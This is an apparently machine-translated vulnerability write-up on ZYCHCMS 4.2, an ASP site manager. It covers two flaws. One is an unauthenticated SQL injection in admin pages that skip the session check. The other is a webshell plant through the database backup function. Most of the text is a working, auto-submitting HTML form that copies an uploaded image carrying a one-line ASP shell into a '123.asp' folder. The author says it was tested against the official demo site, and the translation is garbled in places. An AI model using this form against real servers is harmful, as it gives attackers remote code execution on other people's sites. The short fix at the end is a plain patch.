① SQL Injection Vulnerability
② Backend WBSHELL
Detailed description:
Affected Versions: ZYCHCMS Enterprise Website Management System 4.2 (the versions of the following two files should be kill)
① SQL Injection Vulnerability
Vulnerability file:/admin/add_js.asp &/admin/add_xm_jiang.asp
Vulnerability cause: not filtered
Vulnerability code:
They are all the same. The filter file/admin/seeion. asp is not called at the beginning of the file. As a result, the current permission is not judged and the database is operated directly.
② Backend WBSHELL
There is a database backup in the background. You can use the local submit to break through the creation of a. asp suffix folder and back up a single sentence.
I found one on the Internet and changed it to use it. View result 2
The following code is submitted locally:
<Form method = "post" action = "http: // www.2cto.com/admin/Manage_backup.asp? Action = Backup "name = add>
<! -- Eg: http: // 127.0.0.1: 99/admin/Manage_backup.asp? Action = Backup -->
<Tr>
<Td height = "30" background = "images/bg_list.gif"> <div style = "padding-left: 10px; font-weight: bold; color: # FFFFFF; text-align: left "> back up the database </div> </td>
</Tr>
<Tr>
<Td bgcolor = "# FFFFFF"> <span class = "back_southidc">
</Span>
<Table width = "100%" border = "0" align = "center" cellpadding = "5" cellspacing = "0">
<Tr onmouseover = "style. backgroundColor = '# EEEEEE'" onmouseout = "style. backgroundColor = '# f1f5f8'" bgcolor = "# F1F5F8">
<Td height = "25" width = "30%" class = "td"> <div align = "left"> current database path </div> </td>
& Lt; td width = "70%" class = "td" & gt;
<Div align = "left">
<Input type = "text" size = "30" name = "DBpath" value = "here is a sentence path for the image format uploaded on your website"/>
<! -- Eg: ../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
<Input type = "hidden" size = "50" name = "bkfolder" value = "123.asp"/>
</Div> </td>
</Tr>
<Tr onmouseover = "style. backgroundColor = '# EEEEEE'" onmouseout = "style. backgroundColor = '# ffff'" bgcolor = "# FFFFFF">
<Td height = "25" width = "30%" class = "td"> <div align = "left"> backup database name </div> </td>
<Td class = "td"> <div align = "left">
<Input type = "text" size = "30" name = "bkDBname" value = "4.mdb"/>
[If the backup directory contains this file, it will be overwritten. If not, it will be automatically created] </div> </td>
</Tr>
<Tr onmouseover = "style. backgroundColor = '# EEEEEE'" onmouseout = "style. backgroundColor = '# f1f5f8'" bgcolor = "# F1F5F8">
<Td height = "25" width = "30%" class = "td"> <div align = "left"> </div> </td>
<Td class = "td"> <div align = "left">
<Input type = "submit" value = "Confirm backup" class = "btn"/>
</Div> </td>
</Tr>
</Table> </td> </tr> </form>
</Table>
</Td>
</Tr>
</Table>
<Script>
Document. all. add. submit ();
</Script>
Proof of vulnerability: I used the official demonstration site for testing, 1
Back up a sentence
Solution:
Solution: Add code at the beginning of the file
<! -- # Include file = "seeion. asp" -->